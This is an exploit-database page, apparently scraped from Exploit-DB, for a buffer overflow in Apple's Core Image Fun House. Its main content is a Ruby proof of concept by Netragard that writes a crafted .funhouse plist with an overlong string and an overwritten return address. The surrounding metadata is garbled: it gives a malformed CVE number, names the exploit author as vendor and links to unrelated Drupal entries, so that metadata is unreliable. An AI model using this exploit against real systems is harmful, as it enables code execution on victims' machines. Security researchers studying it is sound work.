Core Image Fun House Buffer Overflow

vendor:

Core Image Fun House

by:

Netragard, LLC.

7.5

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Core Image Fun House

Affected Version From: Unknown

Affected Version To: Unknown

Patch Exists: NO

Related CWE: CVE-2008-067

CPE: a:netragard:core_image_fun_house

Metasploit: https://www.rapid7.com/db/vulnerabilities/drupal-cve-2008-6171/, https://www.rapid7.com/db/vulnerabilities/drupal-cve-2008-6170/

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Mac

2007

Core Image Fun House Buffer Overflow

A buffer overflow vulnerability exists in Core Image Fun House, due to improper bounds checking of user-supplied data. An attacker can exploit this vulnerability by supplying a specially crafted XML file, which can lead to arbitrary code execution. This vulnerability is related to CVE-2008-067.

Mitigation:

No known mitigation is available.

Source

Exploit-DB raw data:

#!/usr/bin/ruby
# Copyright (c) Netragard, LLC. adriel@netragard.com
#
# /Developer/Applications/Graphics Tools/Core Image Fun House.app
# /Contents/MacOS/Core Image Fun House
#
# (gdb) x/10s 0xbfffddf7
# 0xbfffddf7:      'Z' <repeats 101 times>, "DCBA center"
#
# 2007-07-10 21:15:34.573 Core Image Fun House[1061] CFLog (0):
#        CFPropertyListCreateFromXMLData(): plist parse failed;
#        the data is notproper UTF-8. The file name for this data
#        could be:
$
#        /Users/test/Desktop/SuperTastey.funhouse/file.xml
#        The parser will retry as in 10.2, but the problem should be
#         corrected in the plist.
#
#  \x80-\xFF range that do not form proper utf8

len = 300
fname = "SuperTastey"
retaddr = 0x0d0d0d0d  # There are lots of filtered chars!

if File.exist?(fname + ".funhouse/file.xml")
    File.unlink(fname + ".funhouse/file.xml")
    Dir.rmdir(fname + ".funhouse")
end
Dir.mkdir(fname + ".funhouse")

FUNSTUFF =
"<?xml version=\"1.0\" encoding=\"UTF-8\"?>" +
"<!DOCTYPE plist PUBLIC \"-//Apple Computer//DTD PLIST 1.0//EN\"
\"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">" +
"<plist version=\"1.0\">" +
"<dict>" +
"<key>layers</key>" +
"<array>" +
"<dict>" +
"<key>file</key>" +
"<string>" +
"Z" * len + [retaddr].pack("V") +
"</string>" +
"<key>offsetX</key>" +
"<real>0.0</real>" +
"<key>offsetY</key>" +
"<real>0.0</real>" +
"<key>type</key>" +
"<string>image</string>" +
"</dict>" +
"<dict>" +
"<key>classname</key>" +
"<string>CIGlassDistortion</string>" +
"<key>type</key>" +
"<string>filter</string>" +
"<key>values</key>" +
"<dict>" +
"<key>inputCenter_CIVectorValue</key>" +
"<string>[150 150]</string>" +
"<key>inputScale</key>" +
"<real>200</real>" +
"<key>inputTexture</key>" +
"<string>" +
"Z" * 50000 +
"</string>" +
"</dict>" +
"</dict>" +
"</array>" +
"</dict>" +
"</plist>" + "\n"

target_file = File.open("SuperTastey.funhouse/file.xml", "w+") { |f|
~  f.print(FUNSTUFF)  # weeeeee... lets have fun.
~  f.close
} 

# milw0rm.com [2008-07-11]